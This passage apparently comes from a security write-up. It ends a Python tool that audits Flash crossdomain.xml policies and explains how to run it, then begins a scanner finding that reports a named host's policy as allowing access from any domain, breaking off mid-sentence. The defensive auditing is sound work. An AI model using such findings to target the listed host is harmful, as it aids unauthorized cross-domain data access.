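            print("  %-18s %s" % (kind, detail))
```

Run it with one or more hostnames to audit live policies, or with no arguments to see the three constructed samples classified. A policy that names only the specific origins that genuinely need to read responses, together with site-control permitted-cross-domain-policies="master-only", produces no findings.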
7.22. http://d3.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Al